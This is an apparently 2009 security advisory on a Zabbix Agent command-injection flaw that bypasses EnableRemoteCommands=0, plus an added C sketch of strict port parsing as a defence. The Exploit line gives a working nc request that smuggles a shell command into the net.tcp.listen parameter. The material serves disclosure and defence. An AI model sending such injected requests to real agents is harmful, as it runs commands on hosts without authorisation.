Date: Sun, 13 Dec 2009 16:28:30 +0100
From: Nicob <>
Subject: Zabbix Agent : Bypass of EnableRemoteCommands=0

From Wikipedia : "Zabbix is a network management system application
[...] designed to monitor and track the status of various network
services, servers, and other network hardware."

	[Zabbix Agent : Bypass of EnableRemoteCommands=0]

Impacted software : Zabbix Agent (FreeBSD and Solaris only)
Zabbix reference :
Patched version : 1.6.7

Faulty source code : function NET_TCP_LISTEN() in

Exploit : $> echo "net.tcp.listen[80';id;echo ']"|nc -vn xxxxx 10050
Limitation : attacker must come from (or spoof) a trusted IP address

Changelog entry : fixed security vulnerability in processing of
net.tcp.listen under FreeBSD and Solaris agents
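
The request on the Exploit line carries shell metacharacters in the parameter of the net.tcp.listen key. As an added example (not code from the advisory or from the Zabbix source), this C sketch shows the defensive pattern for such a parameter: parse it strictly as a port number and build any helper command from the parsed integer only. The function names and the netstat/grep pipeline are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Extract <param> from "net.tcp.listen[<param>]" and accept it only if it is
 * 1-5 ASCII digits in the range 1..65535. Returns 0 on success, -1 otherwise. */
int listen_key_port(const char *key, unsigned int *port)
{
    static const char prefix[] = "net.tcp.listen[";
    size_t plen = sizeof(prefix) - 1, klen = strlen(key), n, i;
    unsigned long v = 0;
    if (klen < plen + 2 || strncmp(key, prefix, plen) != 0 || key[klen - 1] != ']')
        return -1;
    n = klen - plen - 1;                 /* length of the parameter */
    if (n > 5)
        return -1;
    for (i = 0; i < n; i++) {
        char c = key[plen + i];
        if (c < '0' || c > '9')          /* quotes, ';', spaces, signs all fail here */
            return -1;
        v = v * 10 + (unsigned long)(c - '0');
    }
    if (v < 1 || v > 65535)
        return -1;
    *port = (unsigned int)v;
    return 0;
}

/* Format the helper command from the parsed integer, never from the raw string.
 * The netstat/grep pipeline is a constructed stand-in, not the agent's command. */
int build_listen_cmd(const char *key, char *out, size_t outlen)
{
    unsigned int port;
    int n;
    if (listen_key_port(key, &port) != 0)
        return -1;
    n = snprintf(out, outlen, "netstat -an | grep -c '[.:]%u .*LISTEN'", port);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

int main(void)
{
    /* First key is benign; second is the request string quoted in the advisory. */
    const char *keys[] = { "net.tcp.listen[80]", "net.tcp.listen[80';id;echo ']" };
    char cmd[128];
    for (size_t i = 0; i < 2; i++)
        printf("%-32s -> %s\n", keys[i],
               build_listen_cmd(keys[i], cmd, sizeof(cmd)) == 0 ? cmd : "rejected");
    return 0;
}
```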

